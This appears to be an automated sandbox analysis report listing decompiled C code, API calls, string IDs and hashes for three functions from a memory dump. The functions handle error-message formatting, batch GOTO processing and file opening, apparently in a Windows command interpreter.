                                                    • Instruction ID: 60a33344397155c4b31afdd1e785ca39ac74416fc1a4e70281673e98e544ff37
                                                    • Opcode Fuzzy Hash: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                                    • Instruction Fuzzy Hash: 5F81DA71E002189BDF28EFB8D858BEE7BB5AF55618F08021DFE02A7284DB719945CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F1C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166windowthreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 23%
                                                    			E011F1C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E011E6FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x121807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x1218081 == 0) {
						L5:
						_v524 = 0x11d30d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E011F24CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E011F24CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E011F24CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E011F24CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E011F24CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E011F24CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E011F24CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E011F24CB();
								} else {
									E011F24CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E011F24CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x12194b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}




























                                                    0x011f1c79
                                                    0x011f1c84
                                                    0x011f1c8b
                                                    0x011f1c91
                                                    0x011f1c93
                                                    0x011f1c9a
                                                    0x011f1c9f
                                                    0x011f1e72
                                                    0x011f1e83
                                                    0x011f1cad
                                                    0x011f1cad
                                                    0x011f1cae
                                                    0x011f1cb6
                                                    0x011f1cbb
                                                    0x011f1cde
                                                    0x011f1ce2
                                                    0x011f1cec
                                                    0x011f1cee
                                                    0x011f1d23
                                                    0x011f1cf0
                                                    0x011f1cf0
                                                    0x011f1cf3
                                                    0x011f1d17
                                                    0x011f1cf5
                                                    0x011f1cf5
                                                    0x011f1cf8
                                                    0x011f1d0b
                                                    0x011f1cfa
                                                    0x011f1cfd
                                                    0x011f1cff
                                                    0x011f1cff
                                                    0x011f1cfd
                                                    0x011f1cf8
                                                    0x011f1cf3
                                                    0x011f1d35
                                                    0x011f1d51
                                                    0x011f1d61
                                                    0x011f1d64
                                                    0x011f1d67
                                                    0x011f1d6a
                                                    0x011f1d83
                                                    0x011f1d88
                                                    0x011f1d89
                                                    0x011f1d8a
                                                    0x011f1d8f
                                                    0x011f1d6c
                                                    0x011f1d6c
                                                    0x011f1d79
                                                    0x011f1d7e
                                                    0x011f1d7e
                                                    0x011f1d96
                                                    0x011f1d98
                                                    0x011f1da4
                                                    0x011f1da9
                                                    0x011f1dac
                                                    0x011f1dac
                                                    0x011f1db4
                                                    0x011f1db5
                                                    0x011f1dbe
                                                    0x011f1dbf
                                                    0x011f1dcf
                                                    0x011f1dd6
                                                    0x011f1ddc
                                                    0x011f1dec
                                                    0x011f1df1
                                                    0x011f1df2
                                                    0x011f1df3
                                                    0x011f1df8
                                                    0x011f1dff
                                                    0x011f1e0b
                                                    0x011f1e10
                                                    0x011f1e10
                                                    0x011f1e17
                                                    0x011f1e23
                                                    0x011f1e28
                                                    0x011f1e28
                                                    0x011f1e2f
                                                    0x011f1e4c
                                                    0x011f1e62
                                                    0x011f1e67
                                                    0x011f1e68
                                                    0x011f1e69
                                                    0x011f1e4e
                                                    0x011f1e58
                                                    0x011f1e5d
                                                    0x011f1e31
                                                    0x011f1e31
                                                    0x011f1e3e
                                                    0x011f1e43
                                                    0x011f1e2f
                                                    0x00000000
                                                    0x011f1cc5
                                                    0x011f1cca
                                                    0x011f1cd0
                                                    0x011f1cd8
                                                    0x011f1e71
                                                    0x011f1e71
                                                    0x00000000
                                                    0x011f1e71
                                                    0x00000000
                                                    0x011f1cd8
                                                    0x011f1cbb

                                                    APIs
                                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 011F1D51
                                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 011F1DB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentFormatMessageThread
                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                    • API String ID: 2411632146-2849347638
                                                    • Opcode ID: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                                    • Instruction ID: 11ef462c5647e08d3f75faa70b0c3cdbd028b8f7b44a4285ebacfc2e7a8eb1e1
                                                    • Opcode Fuzzy Hash: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                                    • Instruction Fuzzy Hash: F15122B1900711FBEB3DAF699C08EABBBB8EB54300F00455DF32A92552D7719980CB22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DE560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E011DE560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v44;
				void _v548;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x1213cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x11fd544 != 0) {
							E011F921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x11fd590 = 0;
						if( *0x1213cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E011E0662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E011DEEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x120f980 == 0x234a) {
									E011F82EB(_t118);
									__eflags =  *0x11fd0c8 - 1;
									if( *0x11fd0c8 == 1) {
										__eflags =  *0x1218530;
										if( *0x1218530 == 0) {
											E011F6FF0(_t118);
											E011DC108(_t118, 0x2371, 1, 0x1203892);
											_t152 = _t152 + 0xc;
										}
									}
									E011F9287(_t118);
									__imp__longjmp(0x120b8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E011E00B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E011E6FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E011DDF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E011DDF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x11fd0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x1218530;
											_t74 = _t124;
											if( *0x1218530 == 0) {
												E011F6FF0(_t124);
												_t136 = 0;
												E011F2ED0(_t147, 0);
												E011E25D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								_v20 = 0x104;
								memset( &_v548, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E011E0C70( &_v548, _t77) < 0) {
									E011E0DE8(_t78,  &_v548);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E011DDFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E011E0E00(2, _t147);
										E011E06C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x1203854 = _t82;
										GetCPInfo(_t82, 0x1203840);
										_t149 =  *0x11fd5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x11fd0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x11fd5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x11fd5f8; // 0x0
											 *0x11fd0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x12194b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E011DD7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E011DD7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 =  &_v548;
										}
										_t93 = E011E10B0(_t147, _t141, __eflags, _v20);
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 =  &_v548;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E011E1F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E011F76C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x1213cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}




















































                                                    0x011de560
                                                    0x011de568
                                                    0x011de56e
                                                    0x011de575
                                                    0x011de57f
                                                    0x011de581
                                                    0x011de585
                                                    0x011de589
                                                    0x011de58e
                                                    0x011de592
                                                    0x011de596
                                                    0x011de5a0
                                                    0x011ec011
                                                    0x011ec011
                                                    0x00000000
                                                    0x011de5a6
                                                    0x00000000
                                                    0x011de5b0
                                                    0x011de5b7
                                                    0x011ebe97
                                                    0x011ebe9c
                                                    0x011ebe9c
                                                    0x011de5c4
                                                    0x011de5cb
                                                    0x011de5d5
                                                    0x011de5dc
                                                    0x011de5e1
                                                    0x00000000
                                                    0x00000000
                                                    0x011de5f1
                                                    0x011de5f7
                                                    0x011de5f9
                                                    0x011de5ff
                                                    0x011de602
                                                    0x011de605
                                                    0x011de608
                                                    0x011de60a
                                                    0x011de60f
                                                    0x011de62b
                                                    0x011de62c
                                                    0x011de632
                                                    0x011de637
                                                    0x00000000
                                                    0x00000000
                                                    0x011de640
                                                    0x011ebfcf
                                                    0x011ebfd4
                                                    0x011ebfdb
                                                    0x011ebfdd
                                                    0x011ebfe4
                                                    0x011ebfe6
                                                    0x011ebff7
                                                    0x011ebffc
                                                    0x011ebffc
                                                    0x011ebfe4
                                                    0x011ebfff
                                                    0x011ec00b
                                                    0x00000000
                                                    0x011de656
                                                    0x011de659
                                                    0x011de794
                                                    0x00000000
                                                    0x011de65f
                                                    0x011de65f
                                                    0x011de663
                                                    0x00000000
                                                    0x011de663
                                                    0x011de659
                                                    0x011de640
                                                    0x011de614
                                                    0x011ebea5
                                                    0x011ebeab
                                                    0x011ebeab
                                                    0x011ebeac
                                                    0x011ebeae
                                                    0x011ebeae
                                                    0x011ebeb1
                                                    0x011ebeb1
                                                    0x011ebeb1
                                                    0x011ebeb6
                                                    0x011de621
                                                    0x00000000
                                                    0x011de7ad
                                                    0x011de7b0
                                                    0x011de7b4
                                                    0x00000000
                                                    0x00000000
                                                    0x011de7c4
                                                    0x011de7c6
                                                    0x011de7c8
                                                    0x011ebfc5
                                                    0x011ebfc5
                                                    0x011de798
                                                    0x011de79f
                                                    0x011de7a0
                                                    0x011de7a1
                                                    0x011de7a2
                                                    0x011de7ac
                                                    0x011de7ac
                                                    0x011de7d3
                                                    0x011de7d9
                                                    0x011de7de
                                                    0x011de7e1
                                                    0x011de7e3
                                                    0x00000000
                                                    0x00000000
                                                    0x011de7f0
                                                    0x011de7f5
                                                    0x011de7f8
                                                    0x011de7fa
                                                    0x00000000
                                                    0x00000000
                                                    0x011de805
                                                    0x011de80a
                                                    0x011de80d
                                                    0x011de814
                                                    0x011de667
                                                    0x011de669
                                                    0x011de81d
                                                    0x011de81f
                                                    0x011de827
                                                    0x011de827
                                                    0x011de81f
                                                    0x011de66f
                                                    0x011de673
                                                    0x011de684
                                                    0x011de832
                                                    0x011de836
                                                    0x011de68a
                                                    0x011de691
                                                    0x011de693
                                                    0x011de89d
                                                    0x011de89f
                                                    0x011de8a2
                                                    0x011ebebb
                                                    0x011ebec2
                                                    0x011ebec4
                                                    0x011ebeca
                                                    0x011ebecf
                                                    0x011ebed3
                                                    0x011ebedd
                                                    0x011ebee2
                                                    0x011ebee4
                                                    0x011ebee4
                                                    0x011ebec4
                                                    0x011de8a2
                                                    0x011de693
                                                    0x011de69c
                                                    0x011de846
                                                    0x011de846
                                                    0x011de6ab
                                                    0x011de6b9
                                                    0x011de6c1
                                                    0x011de6cc
                                                    0x011de6d1
                                                    0x011de6dc
                                                    0x011ebeec
                                                    0x011de6e2
                                                    0x011de6e2
                                                    0x011de6e2
                                                    0x011de6f3
                                                    0x011ebfc0
                                                    0x00000000
                                                    0x011de6f9
                                                    0x011de6fb
                                                    0x011ebef6
                                                    0x011ebef8
                                                    0x011de76b
                                                    0x011de772
                                                    0x011de778
                                                    0x00000000
                                                    0x011de778
                                                    0x011de704
                                                    0x011de721
                                                    0x011de721
                                                    0x011de72d
                                                    0x011de731
                                                    0x011de736
                                                    0x011de742
                                                    0x011de747
                                                    0x011de74d
                                                    0x011de755
                                                    0x011ebf4d
                                                    0x011ebf52
                                                    0x011ebf55
                                                    0x011ebf72
                                                    0x011ebf72
                                                    0x011ebf74
                                                    0x011ebf82
                                                    0x011ebf84
                                                    0x011ebf84
                                                    0x011ebf8a
                                                    0x011ebf8a
                                                    0x011ebf8c
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebf97
                                                    0x011de767
                                                    0x011de767
                                                    0x00000000
                                                    0x011de767
                                                    0x011ebf5c
                                                    0x011ebf62
                                                    0x011ebf68
                                                    0x011ebf6d
                                                    0x011ebf70
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ebf70
                                                    0x011de75b
                                                    0x011de75f
                                                    0x011de765
                                                    0x00000000
                                                    0x011de84e
                                                    0x011de856
                                                    0x011de85b
                                                    0x011de85d
                                                    0x00000000
                                                    0x00000000
                                                    0x011de866
                                                    0x011de869
                                                    0x011de86e
                                                    0x011de870
                                                    0x00000000
                                                    0x00000000
                                                    0x011de876
                                                    0x011de87d
                                                    0x011de87f
                                                    0x011de8ad
                                                    0x011de8ad
                                                    0x011de88a
                                                    0x011de88f
                                                    0x011de892
                                                    0x00000000
                                                    0x011de898
                                                    0x011ebf01
                                                    0x011ebf05
                                                    0x011ebf1a
                                                    0x011ebf1a
                                                    0x011ebf21
                                                    0x011ebf23
                                                    0x011ebf25
                                                    0x011ebf25
                                                    0x011ebf29
                                                    0x011ebf2d
                                                    0x011ebf2e
                                                    0x011ebf31
                                                    0x011ebf36
                                                    0x011ebf38
                                                    0x00000000
                                                    0x011ebf3a
                                                    0x011ebf3a
                                                    0x011ebf3c
                                                    0x011ebf44
                                                    0x00000000
                                                    0x011ebf44
                                                    0x011ebf07
                                                    0x011ebf0b
                                                    0x011ebf0d
                                                    0x011ebf12
                                                    0x011ebf14
                                                    0x011ebfa2
                                                    0x011ebfa9
                                                    0x011ebfaf
                                                    0x011ebfb2
                                                    0x00000000
                                                    0x011ebfb2
                                                    0x00000000
                                                    0x011ebf14
                                                    0x011ebf05
                                                    0x011de892
                                                    0x011de704
                                                    0x011de83d
                                                    0x011de83d
                                                    0x011de83d
                                                    0x011de77b
                                                    0x011de781
                                                    0x00000000
                                                    0x00000000
                                                    0x011de787
                                                    0x011de78b
                                                    0x00000000
                                                    0x011de78b
                                                    0x011de673
                                                    0x011de5cb
                                                    0x011de5b0

                                                    APIs
                                                    • _tell.MSVCRT ref: 011DE5F9
                                                    • _close.MSVCRT ref: 011DE62C
                                                    • memset.MSVCRT ref: 011DE6CC
                                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                                    • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                                    • API String ID: 1380661413-3584302480
                                                    • Opcode ID: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                                    • Instruction ID: 6dc516c65a3c5d278609d9408169d379666fc48460fcd179a318d4dcd9cfbe24
                                                    • Opcode Fuzzy Hash: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                                    • Instruction Fuzzy Hash: 53B1F4306097118BDB3DDFA8E45872A7BE1BF84719F05052DE9468B294EB71D885CF83
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DD120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 21%
                                                    			E011DD120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x1213cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x1213cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E011E0178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x1213cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}
























                                                    0x011dd120
                                                    0x011dd12a
                                                    0x011dd12f
                                                    0x011dd132
                                                    0x011dd134
                                                    0x011dd137
                                                    0x011dd139
                                                    0x011dd140
                                                    0x011dd147
                                                    0x011dd151
                                                    0x011dd15c
                                                    0x00000000
                                                    0x011dd15c
                                                    0x011dd155
                                                    0x011dd15a
                                                    0x011dd16a
                                                    0x011dd1ea
                                                    0x011dd1ef
                                                    0x011dd1f5
                                                    0x011dd1fa
                                                    0x011dd1fc
                                                    0x011dd201
                                                    0x011dd201
                                                    0x011dd204
                                                    0x011dd207
                                                    0x011dd16c
                                                    0x011dd16c
                                                    0x011dd171
                                                    0x011dd171
                                                    0x011dd173
                                                    0x011dd175
                                                    0x011dd180
                                                    0x011dd221
                                                    0x011dd227
                                                    0x011dd22c
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd232
                                                    0x011dd234
                                                    0x011dd239
                                                    0x011dd23e
                                                    0x011dd23f
                                                    0x011dd242
                                                    0x011dd243
                                                    0x00000000
                                                    0x011dd186
                                                    0x011dd186
                                                    0x011dd18a
                                                    0x011dd18b
                                                    0x011dd18c
                                                    0x011dd18d
                                                    0x011dd18e
                                                    0x011dd18e
                                                    0x011dd194
                                                    0x011dd199
                                                    0x011eb555
                                                    0x011eb55b
                                                    0x011eb563
                                                    0x011eb565
                                                    0x011eb565
                                                    0x011eb56f
                                                    0x011eb56f
